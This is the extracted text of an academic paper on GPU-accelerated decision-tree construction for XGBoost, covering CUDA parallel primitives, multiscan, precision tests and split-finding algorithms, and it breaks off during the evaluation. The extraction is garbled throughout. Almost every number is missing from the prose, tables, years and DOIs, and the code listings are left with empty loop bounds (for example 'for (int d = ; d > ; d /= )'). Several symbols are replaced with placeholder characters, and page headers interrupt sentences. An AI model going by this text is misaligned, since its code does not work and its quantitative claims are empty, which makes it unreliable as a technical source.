purpose of this paper is to describe how to efficiently implement decision tree learning for xgboost on a gpu. gpus can be thought of at a high level as having a shared memory architecture with multiple simd (single instruction multiple data) processors. these simd processors operate in lockstep typically in batches of ‘threads’ (matloff, ). gpus are optimised for high throughput and work to hide latency through the use of massive parallelism. this is in contrast to cpus which use multiple caches, branch prediction and speculative execution in order to optimise latency with regards to data dependencies (baxter, ). gpus have been used to accelerate a variety of tasks traditionally run on cpus, providing significant speedups for parallelisable problems with a high arithmetic intensity. of particular relevance to machine learning is the use of gpus to train extremely large neural networks. it was shown in that one billion parameter networks could be trained in a few days on three gpu machines (coates et al., ). languages and libraries the two main languages for general purpose gpu programming are cuda and opencl. cuda was chosen for the implementation discussed in this paper due to the availability of optimised and production ready libraries. the gpu tree construction algorithm would not be possible without a strong parallel primitives library. we make extensive use of scan, reduce and radix sort primitives from the cub (merrill & nvidia-labs, ) and thrust (hoberock & bell, ) libraries. these parallel primitives are described in detail in ‘parallel primitives.’ the closest equivalent to these libraries in opencl is the boost compute library. several problems were encountered when attempting to use boost compute and the performance of its sorting primitives lagged considerably behind those of cub/thrust. at the time of writing this paper opencl was not a practical option for this type of algorithm. mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ execution model cuda code is written as a kernel to be executed by many thousands of threads. all threads execute the same kernel function but their behaviour may be distinguished through a unique thread id. listing shows an example of kernel adding values from two arrays into an output array. indexing is determined by the global thread id and any unused threads are masked off with a branch statement. listing example cuda kernel __global__ void example(float �d_a, float �d_b, float �d_output, int n){ //calculate global thread index //blockidx.x - the current thread block number //blockdim.x - the thread block size //threadidx.x - the thread index within the current block int global_tid = blockidx.x � blockdim.x + threadidx.x; if(global_tid < n){ d_output[global_tid] = d_a[global_tid] + d_b[global_tid]; } } threads are grouped according to thread blocks that typically each contain some multiple of threads. a group of threads is known as a warp. thread blocks are queued for execution on hardware streaming multiprocessors. streaming multiprocessors switch between different warps within a block during program execution in order to hide latency. global memory latency may be hundreds of cycles and hence it is important to launch sufficiently many warps within a thread block to facilitate latency hiding. a thread block provides no guarantees about the order of thread execution unless explicit memory synchronisation barriers are used. synchronisation across thread blocks is not generally possible within a single kernel launch. device-wide synchronisation is achieved by multiple kernel launches. for example, if a global synchronisation barrier is required within a kernel, the kernel must be separated into two distinct kernels where synchronisation occurs between the kernel launches. memory architecture cuda exposes three primary tiers of memory for reading and writing. device-wide global memory, thread block accessible shared memory and thread local registers. � global memory: global memory is accessible by all threads and has the highest latency. input data, output data and large amounts of working memory are typically stored in global memory. global memory can be copied from the device (i.e. the gpu) to the host computer and vice versa. bandwidth of host/device transfers is much slower mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ than that of device/device transfers and should be avoided if possible. global memory is accessed in byte cache lines on current gpus. memory accesses should be coalesced in order to achieve maximum bandwidth. coalescing refers to the grouping of aligned memory load/store operations into a single transaction. for example, a fully coalesced memory read occurs when a warp of threads loads contiguous byte words ( bytes). fully uncoalesced reads (typical of gather operations) can limit device bandwidth to less than % of peak bandwidth (harris, ). � shared memory: kb of shared memory is available to each thread block. shared memory is accessible by all threads in the block and has a significantly lower latency than global memory. it is typically used as working storage within a thread block and sometimes described as a ‘programmer-managed cache.’ � registers: a finite number of local registers is available to each thread. operations on registers are generally the fastest. threads within the same warp may read/write registers from other threads in the warp through intrinsic instructions such as shuffle or broadcast (nvidia, ). parallel primitives graphicsprocessingunitprimitivesaresmall algorithms usedasbuildingblocksinmassively parallel algorithms. while many data parallel tasks can be expressed with simple programs without them, gpu primitives may be used to compose more complicated algorithms while retaining high performance, readability and reliability. understanding which specific tasks can be achieved using parallel primitives and the relative performance of gpu primitives as compared to their cpu counterparts is key to designing effective gpu algorithms. reduction a parallel reduction reduces an array of values into a single value using a binary-associative operator. given a binary-associative operator and an array of elements the reduction returns ða a � � � an� Þ. note that floating point addition is not strictly associative. this means a sequential reduction operation will likely result in a different answer to a parallel reduction (the same applies to the scan operation described below). this is discussed in greater detail in ‘floating point precision.’ the reduction operation is easy to implement in parallel by passing partial reductions up a tree, taking o(logn) iterations given n input items and n processors. this is illustrated in fig. . in practice, gpu implementations of reductions do not launch one thread per input item but instead perform parallel reductions over ‘tiles’ of input items then sum the tiles together sequentially. the size of a tile varies according to the optimal granularity for a given hardware architecture. reductions are also typically tiered into three layers: warp, block and kernel. individual warps can very efficiently perform partial reductions over items using shuffle instructions introduced from nvidia’s kepler gpu architecture onwards. as smaller reductions can be combined into larger reductions by simply applying the binary associative operator on the outputs, these smaller warp reductions can be combined together to get the reduction for the entire tile. the thread block can mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ iterate over many input tiles sequentially, summing the reduction from each. when all thread blocks are finished the results from each are summed together at the kernel level to produce the final output. listing shows code for a fast warp reduction using shuffle intrinsics to communicate between threads in the same warp. the ‘shuffle down’ instruction referred to in listing simply allows the current thread to read a register value from the thread d places to the left, so long as that thread is in the same warp. the complete warp reduction algorithm requires five iterations to sum over items. listing warp reduction __device__ float warp_reduce(float x) { for (int d = ; d > ; d /= ) x += __shfl_down(x, d); return x; } reductions are highly efficient operations on gpus. an implementation is given in harris ( ) that approaches the maximum bandwidth of the device tested. parallel prefix sum (scan) the prefix sum takes a binary associative operator (most commonly addition) and applies it to an array of elements. given a binary associative operator and an array of elements the prefix sum returns ½a ; ða a Þ; :::; ða a ::: an� Þ�. a prefix sum is an example of a calculation which seems inherently serial but has an efficient parallel algorithm: the blelloch scan algorithm. let us consider a simple implementation of a parallel scan first, as described in hillis & steele ( ). it is given in algorithm . figure shows it in operation: we apply a simple scan with the addition operator to an array of ’s. given one thread for each input element the scan takes log n ¼ iterations to complete. the algorithm performs o(nlog n) addition operations. given that a sequential scan performs only n addition operations, the simple parallel scan is not work efficient. a work efficient parallel algorithm will perform the same number figure sum parallel reduction. mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ of operations as the sequential algorithm and may provide significantly better performance in practice. a work efficient algorithm is described in blelloch ( ). the algorithm is separated into two phases, an ‘upsweep’ phase similar to a reduction and a ‘downsweep’ phase. we give pseudocode for the upsweep (algorithm ) and downsweep (algorithm ) phases by following the implementation in harris, sengupta & owens ( ). figure simple parallel scan example. algorithm simple scan for d= to log n do for k= to n- in parallel do if k d- then x[k] := x[k - d- ] + x[k] end end end algorithm blelloch scan—upsweep offset = for d= log n to do for k= to n- in parallel do if k < d- then ai = offset � ( � k + ) - bi = offset � ( � k + ) - x[bi] = x[bi] + x[ai] end end offset = offset * end mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figures and show examples of the work efficient blelloch scan, as an exclusive scan (the sum for a given item excludes the item itself). solid lines show summation with the previous item in the array, dotted lines show replacement of the previous item with the new value. o(n) additions are performed in both the upsweep and downsweep phase resulting in the same work efficiency as the serial algorithm. a segmented variation of scan that processes contiguous blocks of input items with different head flags can be easily formulated. this is achieved by creating a binary associative operator on key value pairs. the operator tests the equality of the keys and sums the values if they belong to the same sequence. this is discussed further in ‘scan and reduce on multiple sequences.’ figure blelloch scan upsweep example. algorithm blelloch scan—downsweep offset ¼ log n� x[n - ] := for d= to log n do for k= to n- in parallel do if k < d- then ai = offset � ( � k + ) - bi = offset � ( � k + ) - t = x[ai] x[ai] = x[bi] x[bi] = x[bi] + t end end offset = offset/ end mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ a scan may also be implemented using warp intrinsics to create fast item prefix sums based on the simple scan in fig. . code for this is shown in listing . although the simple scan algorithm is not work efficient, we use this approach for small arrays of size . listing warp scan __device__ float warp_scan(float x) { int lane_id = threadidx.x % ; for (int d = ; d < ; d �= ){ float tmp = __shfl_up(x, d); if (lane_id >= offset){ x += tmp; } } return x; } radix sort radix sorting on gpus follows from the ability to perform parallel scans. a scan operation may be used to calculate the scatter offsets for items within a single radix digit as described in algorithm and fig. . flagging all ‘ ’ digits with a one and performing an exclusive scan over these flags gives the new position of all zero digits. all ‘ ’ digits must be placed after all ‘ ’ digits, therefore the final positions of the ‘ ’s can be calculated as the exclusive scan of the ‘ ’s plus the total number of ‘ ’s. the exclusive scan of ‘ ’ digits does not need to be calculated as it can be inferred from the array index and the exclusive scan of ‘ ’s. for example, at index (using -based indexing), if our exclusive scan shows a sum of ‘ ’s, then there must be two ‘ ’s because a digit can only be or . figure blelloch scan downsweep example. mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the basic radix sort implementation only sorts unsigned integers but this can be extended to correctly sort signed integers and floating point numbers through simple bitwise transformations. fast implementations of gpu radix sort perform a scan over many radix bits in a single pass. merrill & grimshaw ( ) show a highly efficient and practical implementation of gpu radix sorting. they show speedups of � over a core cpu and claim to have the fastest sorting implementation for any fully programmable microarchitecture. algorithm radix sort pass input :x output :y for i = to n - in parallel do f[i] := bit_flip(x[i]) end s := exclusive_scan(f) r := s[n - ] + f[n - ] for i = to n - in parallel do if x[i] = then a[i] := s[i] else if x[i] = then a[i] := i - s[i] + r end for i = to n - in parallel do y[a[i]] := x[i] end figure radix sort example. mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ scan and reduce on multiple sequences variations on scan and reduce consider multiple sequences contained within the same input array and identified by key flags. this is useful for building decision trees as the data can be repartitioned into smaller and smaller groups as we build the tree. we will describe an input array as containing either ‘interleaved’ or ‘segmented’ sequences. table shows an example of two interleaved sequences demarcated by flags. its values are mixed up and do not reside contiguously in memory. this is in contrast to table , with two ‘segmented’ sequences. the segmented sequences reside contiguously in memory. segmented scan a scan can be performed on the sequences from table using the conventional scan algorithm described in ‘parallel prefix sum (scan)’ by modifying the binary associative operator to accept key value pairs. listing shows an example of a binary associative operator that performs a segmented summation. it resets the sum when the key changes. listing segmented sum operator keyvalue op(keyvalue a, keyvalue b){ if(a.key == b.key){ b.value += a.value; return b; } else{ return b; } } segmented reduce a segmented reduction can be implemented efficiently by applying the segmented scan described above and collecting the final value of each sequence. this is because the last element in a scan is equivalent to a reduction. table interleaved sequences. sequence id values values scan table segmented sequences. sequence id values values scan mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ interleaved sequences: multireduce a reduction operation on interleaved sequences is commonly described as a multireduce operation. to perform a multireduce using the conventional tree algorithm described in ‘reduction’ a vector of sums can be passed up the tree instead of a single value, with one sum for each unique sequence. as the number of unique sequences or ‘buckets’ increases, this algorithm becomes impractical due to limits on temporary storage (registers and shared memory). a multireduce can alternatively be formulated as a histogram operation using atomic operations in shared memory. atomic operations allow multiple threads to safely read/write a single piece of memory. a single vector of sums is kept in shared memory for the entire thread block. each thread can then read an input value and increment the appropriate sum using atomic operations. when multiple threads contend for atomic read/write access on a single piece of memory they are serialised. therefore, a histogram with only one bucket will result in the entire thread block being serialised (i.e. only one thread can operate at a time). as the number of buckets increases this contention is reduced. for this reason the histogram method will only be appropriate when the input sequences are distributed over a large number of buckets. interleaved sequences: multiscan a scan operation performed on interleaved sequences is commonly described as a multiscan operation. a multiscan may be implemented, like multireduce, by passing a vector of sums as input to the binary associative operator. this increases the local storage requirements proportionally to the number of buckets. general purpose multiscan for gpus is discussed in eilers ( ) with the conclusion that ‘multiscan cannot be recommended as a general building block for gpu algorithms.’ however, highly practical implementations exist that are efficient up to a limited number of interleaved buckets, where the vector of sums approach does not exceed the capacity of the device. the capacity of the device in this case refers to the amount of registers and shared memory available for each thread to store and process a vector. merill and grimshaw’s optimised radix sort implementation (merrill & nvidia-labs, ; merrill & grimshaw, ), mentioned in ‘radix sort,’ relies on an eight-way multiscan in order to calculate scatter addresses for up to bits at a time in a single pass. floating point precision the cpu implementation of the xgboost algorithm represents gradient/hessian pairs using two bit floats. all intermediate summations are performed using bit doubles to control loss of precision from floating point addition. this is problematic when using gpus as the number of intermediate values involved in a reduction scales with the input size. using doubles significantly increases the usage of scarce registers and shared memory; moreover, gaming gpus are optimised for bit floating point operations and give relatively poor double precision throughput. mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table shows the theoretical gflops of two cards we use for benchmarking. the single precision gflops are calculated as � number of cuda cores � core clock speed (in ghz), where the factor of represents the number of operations per required fma (fused-multiply-add) instruction. both these cards have times more single precision alus (arithmetic logic units) than double precision alus, resulting in / the theoretical double precision performance. therefore, an algorithm relying on double precision arithmetic will have severely limited performance on these gpus. we can test the loss of precision from bit floating point operations to see if double precision is necessary by considering bit parallel and sequential summation, summing over a large array of random numbers. sequential double precision summation is used as the baseline, with the error measured as the absolute difference from the baseline. the experiment is performed over million random numbers between - and , with repeats. the mean error and standard deviation are reported in table . the thrust library is used for parallel gpu reduction based on single precision operations. the bit parallel summation shows dramatically superior numerical stability compared to the bit sequential summation. this is because the error of parallel summation grows proportionally to o(logn), as compared to o(n) for sequential summation (higham, ). the parallel reduction algorithm from fig. is commonly referred to as ‘pairwise summation’ in literature relating to floating point precision. the average error of . over million items shown in table is more than acceptable for the purposes of gradient boosting. the results also suggests that the sequential summation within the original xgboost could be safely performed in single precision floats. a mean error of . over million items is very unlikely to be significant compared to the noise typically present in the training sets of supervised learning tasks. building tree classifiers on gpus graphics processing unit-accelerated decision trees and forests have been studied as early as in sharp ( ) for the purpose of object recognition, achieving speedups of up to � for this task. decision forests were mapped to a -d texture array and trained/evaluated using gpu pixel and vertex shaders. a more general purpose random forest implementation is described in grahn et al. ( ) showing speedups of table gpu gflops. gpu single precision double precision gtx (maxwell) , titan x (pascal) , table bit floating point precision. algorithm mean error sd sequential . . parallel . . mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ up to � over state-of-the-art cpu implementations for large numbers of trees. the authors use an approach where one gpu thread is launched to construct each tree in the ensemble. a decision tree construction algorithm using cuda based on the sprint decision tree inducer is described in chiu, luo & yuan ( ). no performance results are reported. another decision tree construction algorithm is described in lo et al. ( ). they report speedups of – � over weka’s java-based implementation of c . (quinlan, ), called j , and � over sprint. their algorithm processes one node at a time and as a result scales poorly at higher tree depths due to higher per-node overhead as compared to a cpu algorithm. nasridinov, lee & park ( ) describe a gpu-accelerated algorithm for id decision tree construction, showing moderate speedups over weka’s id implementation. nodes are processed one at a time and instances are resorted at every node. strnad & nerat ( ) devise a decision tree construction algorithm that stores batches of nodes in a work queue on the host and processes these units of work on the gpu. they achieve speedups of between � and � on large data sets as compared to a multithreaded cpu implementation. instances are resorted at every node (strnad & nerat, ). our work has a combination of key features differentiating it from these previous approaches. first, our implementation processes all nodes in a level concurrently, allowing it to scale beyond trivial depths with near constant run-time. a gpu tree construction algorithm that processes one node at a time will incur a nontrivial constant kernel launch overhead for each node processed. additionally, as the training set is recursively partitioned at each level, the average number of training examples in each node decreases rapidly. processing a small number of training examples in a single gpu kernel will severely underutilise the device. this means the run-time increases dramatically with tree depth. to achieve state-of-the-art results in data mining competitions we found that users very commonly required tree depths of greater than in xgboost. this contradicts the conventional wisdom that a tree depth of between and is sufficient for most boosting applications (friedman, hastie & tibshirani, ). our approach of processing all nodes on a level concurrently is far more practical in this setting. secondly, our decision tree implementation is not a hybrid cpu/gpu approach and so does not use the cpu for computation. we find that all stages of the tree construction algorithm can be efficiently completed on the gpu. this was a conscious design decision in order to reduce the bottleneck of host/device memory transfers. at the time of writing, host/device transfers are limited to approximately gb/s by the bandwidth of the gen pcie standard. the titan x gpu we use for benchmarking has an on-device memory bandwidth of gb/s, a factor of times greater. consequently, applications that move data back and forward between the host and device will not be able to achieve peak performance. building the entire decision tree in device memory has the disadvantage that the device often has significantly lower memory capacity than the host. despite this, we show that it is possible to process some very large benchmark datasets entirely in device memory on a commodity gpu. mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ thirdly, our algorithm implements the sparsity aware tree construction method introduced by xgboost. this allows it to efficiently process sparse input matrices in terms of run-time and memory usage. this is in contrast to previous gpu tree construction algorithms. additionally, our implementation is provided as a part of a fully featured machine learning library. it implements regression, binary classification, multiclass classification and ranking through the generalised gradient boosting framework of xgboost and has an active user base. no published implementations exist for any of the existing gpu tree construction algorithms described above, making direct comparison to the approach presented in this work infeasible. parallel tree construction our algorithm builds a single decision tree for a boosting iteration by processing decision tree nodes in a level-wise manner. at each level we search for the best split within each leaf node, update the positions of training instances based on these new splits and then repartition data if necessary. processing an entire level at a time allows us to saturate the gpu with the maximum amount of work available in a single iteration. our algorithm performs the following three high level phases for each tree level until the maximum tree depth is reached: ( ) find splits, ( ) update node positions, and ( ) sort node buckets (if necessary). phase : find splits the first phase of the algorithm finds the best split for each leaf node at the current level. data layout to facilitate enumeration through all split points, the feature values should be kept in sorted order. hence, we use the device memory layout shown in tables and . each feature value is paired with the id of the instance it belongs to as well as the leaf node it currently resides in. data are stored in sparse column major format and instance ids are used to map back to gradient pairs for each instance. all data are stored in arrays in device memory. the tree itself can be stored in a fixed length device array as it is strictly binary and has a maximum depth known ahead of time. block level parallelism given the above data layout notice that each feature resides in a contiguous block and may be processed independently. in order to calculate the best split for the root node of the tree, we greedily select the best split within each feature, delegating a single thread block per feature. the best splits for each feature are then written out to global memory and are reduced by a second kernel. a downside of this approach is that when the number of features is not enough to saturate the number of streaming multiprocessors—the hardware units responsible for executing a thread block—the device will not be fully utilised. calculating splits in order to calculate the best split for a given feature we evaluate eq. ( ) at each possible split location. this depends on (gl, hl) and (gr, hr). we obtain (gl, hl) mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ from a parallel scan of gradient pairs associated with each feature value. (gr, hr) can be obtained by subtracting (gl, hl) from the node total which we know from the parent node. the thread block moves from left to right across a given feature, consuming ‘tiles’ of input. a tile herein refers to the set of input items able to be processed by a thread block in one iteration. table gives an example of a thread block with four threads evaluating a tile with four items. for a given tile, gradient pairs are scanned and all splits are evaluated. each thread warp performs a reduction to find the best local split and keeps track of the current best feature value and accompanying gradient statistics in shared memory. at the end of processing the feature, another reduction is performed over all the warps’ best items to find the best split for the feature. missing values the original xgboost algorithm accounts for missing values by scanning through the input values twice as described in ‘xgboost: handling missing values’—once in the forwards direction and once in the reverse direction. an alternative method used by our gpu algorithm is to perform a sum reduction over the entire feature before scanning. the gradient statistics for the missing values can then be calculated as the node sum statistics minus the reduction. if the sum of the gradient pairs from the missing values is known, only a single scan is then required. this method was chosen as the cost of a reduction can be significantly less than performing the second scan. table device memory layout: gradient pairs. instance id gradient pair p p p p table device memory layout: feature values. f f f node id instance id feature value . . . . . . . . table a single thread block evaluating splits. thread block ⇒ b b b b f instance id feature value . . . . . . . . gradient pair p p p p p p p p mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ node buckets so far the algorithm description only explains how to find a split at the first level where all instances are bucketed into a single node. a decision tree algorithm must, by definition, separate instances into different nodes and then evaluate splits over these subsets of instances. this leaves us with two possible options for processing nodes. the first is to leave all data instances in their current location, keeping track of which node they currently reside in using an auxiliary array as shown in table . when we perform a scan across all data values we keep temporary statistics for each node. we therefore scan across the array processing all instances as they are interleaved with respect to their node buckets. this is the method used by the cpu xgboost algorithm. we also perform this method on the gpu, but only to tree depths of around . this interleaved algorithm is fully described in ‘interleaved algorithm: finding a split.’ the second option is to radix sort instances by their node buckets at each level in the tree. this second option is described fully in ‘sorting algorithm: finding a split.’ briefly, data values are first ordered by their current node and then by feature values within their node buckets as shown in table . this transforms the interleaved scan (‘multiscan’) problem described above into a segmented scan, which has constant temporary storage requirements and thus scales to arbitrary depths in a gpu implementation. in our implementation, we use the interleaved method for trees of up to depth and then switch to the sorting version of the algorithm. avoiding the expensive radix sorting step for as long as possible can provide speed advantages, particularly when building small trees. the maximum number of leaves at depth is . at greater depths there are insufficient shared memory resources and the exponentially increasing run-time begins to be uncompetitive. interleaved algorithm: finding a split in order to correctly account for missing values a multireduce operation must be performed to obtain the sums within interleaved sequences of nodes. a multiscan is table interleaved node buckets. f f f node id instance id feature value . . . . . . . . table sorted node buckets. f f f node id instance id feature value . . . . . . . . mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ then performed over gradient pairs. following that, unique feature values are identified and gain values calculated to identify the best split for each node. we first discuss the multireduce and multiscan operations before considering how to evaluate splits. multireduce and multiscan algorithms and outline the approach used for multireduce/multiscan at the thread block level. our multiscan/multireduce approach is formulated around sequentially executing fast warp synchronous scan/reduce operations for each bucket. passing vectors of items to the binary associative operator is not generally possible given the number of buckets and the limited temporary storage. this was discussed in ‘scan and reduce on multiple sequences.’ we instead perform warp level multiscan operations. listing shows how a -thread warp can perform a multiscan by masking off non-active node buckets and performing a normal warp scan for each node bucket. the function ‘warpexclusivescan()’ herein refers to an exclusive version of the warp scan described in listing . listing warp multiscan gpu_gpair gpair; //gradient values for current item int node_id; //node bucket of current item gpu_gpair exclusive_scan_output; for (int node = ; node < n_nodes; node++) { bool node_active = node_id == node; gpu_gpair scan_result; gpu_gpair node_sum; algorithm multireduce—thread block execution . an input tile is loaded. . each warp performs local reduction for each bucket, masking off items for the current bucket. . each warp adds its local reductions into shared memory. . the remaining tiles are processed. . the partial sums in shared memory are reduced by a single warp into the final node sums. algorithm multiscan—thread block execution . an input tile is loaded. . each warp performs local scans for each bucket, masking off items for the current bucket. . the sums from each local scan are placed into shared memory. . the partial sums in shared memory are scanned. . the scanned partial sums in shared memory are added back into the local values. . the running sum from the previous tile is added to the local values. . the remaining tiles are processed. mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ //first argument is the scan input //result is placed in the second argument //warp sum is placed in the third argument warpexclusivescan(node_active ? gpair : gpu_gpair(), scan_result, node_sum); if (node_active) { exclusive_scan_output = scan_result; } } note that the number of warp reductions/scans performed over a warp of data increases exponentially with tree depth. this leads to an exponentially increasing run time relative to the depth of the tree, but is surprisingly performant even up to depth as warp synchronous reductions/scans using shuffle instructions are cheap to compute. they only perform operations on registers and incur no high latency reads or writes into global memory. the exclusive scan for the entire input tile is calculated from individual warp scans by performing the same multiscan operation over the sums of each warp scan and scattering the results of this back into each item. more detailed information on how to calculate a block-wide scan from smaller warp scan operations is given in nvidia ( ). evaluating splits there is one additional problem that must be solved. it arises as a consequence of processing node buckets in interleaved order. in a decision tree algorithm, when enumerating through feature values to find a split, we should not choose a split that falls between two elements with the same value. this is because a decision rule will not be able to separate elements with the same value. for a value to be considered as a split, the corresponding item must be the leftmost item with that feature value for that particular node (we could also arbitrarily take the rightmost value). because the node buckets are interleaved, it is not possible to simply check the item to the left to see if the feature value is the same—the item to the left of a given item may reside in a different node. to check if an item with a certain feature value is the leftmost item with that value in its node bucket, we can formulate a scan with a special binary associative operator. first, each item is assigned a bit vector~x of length n + where n is the number of buckets. if the item resides within bucket i then xi will be set to . if the item’s feature value is distinct from the value of the item directly to the left (irrespective of bucket) then xn+ is set to . all other bits are set to . we can then define a binary associative operator as follows: opð~a;~bÞ ¼ � ~b if bnþ ¼ ~a _~b ; otherwise ( ) mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ bit xn+ acts as a segmentation flag, resetting the scan so many small scans are performed across groups of items with the same feature value. scanning the bucket flags with a logical or operator determines which node buckets are represented in the items to the left of the current item. therefore, within a group of items with the same feature value, if the current item’s bucket flag is set to for the bucket it resides in, the item represents the leftmost item with that value in its bucket. this item can then be used as a split point. in practice, a bit integer is used as the bit vector in order to hold a maximum of bits at the sixth level of the tree (the maximum number of active nodes at this level + for the segmentation flag). the operator is formulated according to listing in c++ code. moreover, when applying this interleaved algorithm we cannot choose the split value as the halfway point between two training examples: we do not know the value of the item to the left within the current node, only if it is the same as the current item or not. the split value is accordingly calculated as the current value minus some small constant. this distinction in the split value does not affect accuracy in practice. listing binary associative operator bitflagset op(const bitflagset &a, const bitflagset &b) { if (check_bit(b, )) { return b; } else { return a | b; } } complete algorithm given a reduction, scan and the above method for finding unique feature values we have all the machinery necessary to enumerate splits and select the best. the complete algorithm for a thread block processing a single feature at a given tree level is shown in algorithm . the output of this algorithm contains the best split for each leaf node for a given feature. each thread block outputs the best splits for its assigned feature. these splits are then further reduced by a global kernel to find the best splits for any feature. sorting algorithm: finding a split the sorting implementation of the split finding algorithm operates on feature value data grouped into node buckets. given data sorted by node id first and then feature values second we can perform segmented scan/reduce operations over an entire feature only needing a constant amount of temporary storage. the segmented reduction to find gradient pair sums for each node is implemented as a segmented sum scan, storing the final element from each segment as the node sum. mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ another segmented scan is then performed over the input feature to get the exclusive scan of gradient pairs. after scanning each tile, the split gain is calculated using the scan and reduction as input and the best splits are stored in shared memory. the segmented scan is formulated by performing an ordinary scan over key value pairs with a binary associative operator that resets the sum when the key changes. in this case the key is the current node bucket and the value is the gradient pair. the operator is shown in eq. ( ). opðakey; avalue; bkey; bvalueÞ ¼ ðbkey; bvalueÞ; if akey ¼ bkey ðbkey; avalue þ bvalueÞ; otherwise � ( ) an overview of the split finding algorithm for a single thread block processing a feature is provided in algorithm . the output of this algorithm, like that of the interleaved algorithm, consists of the best splits for each feature, and each node. this is reduced by a global kernel to find the best splits for each node, of any feature. algorithm interleaved algorithm—thread block execution . load input tile . multireduce tile gradient pairs . go to . until all tiles processed . return to first tile . load input tile . multiscan tile gradient pairs . scan tile for unique feature values . calculate gain for each split . store best split for each warp . go to . until all tiles processed . output best splits algorithm sorting algorithm split finding—thread block execution . load input tile . segmented reduction over tile gradient pairs . go to . until all tiles processed . return to first tile . load input tile . segmented scan over tile gradient pairs . calculate gain for each split . store best split for each warp . go to . until all tiles processed . output best splits mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ phase : update node positions once the best splits for each node have been calculated, the node positions for each instance must be updated. this is made non-trivial because of the presence of missing values. we first create an array containing the pre-split node position of each training instance. these node positions are then updated as if they contained all missing values, according to the default missing direction in the newly calculated splits. we then update this array again based on the feature values of the instances. any instance which does not have a value for that feature (missing value) will have its node position left unchanged as per the missing direction. because we now have the updated node position for each instance, we write these node positions back to each feature value. to illustrate this with an example, fig. shows the state of a decision tree after having calculated splits for level . the node positions in the data structure used for split finding (table ) must be updated before proceeding to calculate the splits for level . to do this we update the array in table that maps instances to a node. first we update the node id map in the missing direction. all instances residing in node are updated in the right direction to node . instances residing in node are updated in the left direction to node . the node id map now looks like table . we now update the map again using the feature values from table , overwriting the previous values. instance resides in node so we check if f < . . this is true so instance moves down the left branch into node . instance moves into node and instance moves into node based on their f values. note that instance has a missing value for f . its node position is therefore kept as the missing direction updated in the previous step. this process is shown in table . the per instance node id array is now up-to-date for the new level so we write these values back into the per feature value array, giving table . phase : sort node buckets if the sorting version of the algorithm is used, the feature values need to be sorted by node position. if the interleaved version of the algorithm is used (e.g. in early tree levels) this step is unnecessary. each feature value with its updated node position is sorted such figure decision tree: four new leaves. mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ that each node bucket resides in contiguous memory. this is achieved using a segmented key/value radix sort. each feature represents a segment, the sort key is the node position and the feature value/instance id tuple is the value. we use the segmented radix sort function from the cub library. it delegates the sorting of each feature segment to a separate thread block. note that radix sorting is stable so the original sorted order of the feature values will be preserved within contiguous node buckets, after sorting with node position as the key. evaluation the performance and accuracy of the gpu tree construction algorithm for xgboost is evaluated on several large datasets and two different hardware configurations and also compared to cpu-based xgboost on a core intel processor. the hardware table per feature value array. f f node id instance id feature value . . . . . . . table node id map. instance id node id table updated missing direction. instance id node id table node id map: update based on feature value. instance id node id f f node id instance id feature value . . . . . . . table per feature value array: updated. f f node id instance id feature value . . . . . . . mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ configurations are described in table . on configuration # , where there is limited device memory, a subset of rows from each dataset is taken in order to fit within device memory. the datasets are described in table and parameters used for each dataset are shown in table . for the yltr dataset we use the supplied training/test split. for the higgs dataset we randomly select , , instances for the test set, as in chen & guestrin ( ). for the bosch dataset we randomly sample % of the instances for the test set and use the rest for the training set. we use boosting iterations for all datasets unless otherwise specified. this is a common real world setting that provides sufficiently long run-times for benchmarking. we set � (the learning rate) to . as the xgboost default of . is too high for the number of boosting iterations. for the yltr and bosch datasets we use the default tree depth of six because both of these datasets tend to generate small trees. the higgs dataset results in larger trees so we can set max depth to , allowing us to test performance for large trees. both the higgs and bosch datasets are binary classification problems so we use the binary:logistic objective function for xgboost. both higgs and bosch also exhibit highly imbalanced class distributions, so the auc (area under the table hardware configurations. configuration cpu ghz cores cpu arch. # intel i - . haswell # intel i - k . skylake # � intel xeon e - v . ivy bridge configuration gpu gpu memory (gb) gpu arch. # gtx maxwell # titan x pascal # – – – table datasets. dataset training instances test instances features yltr a , , higgs b , , , bosch c , , , notes: a https://webscope.sandbox.yahoo.com/catalog.php?datatype=c. b 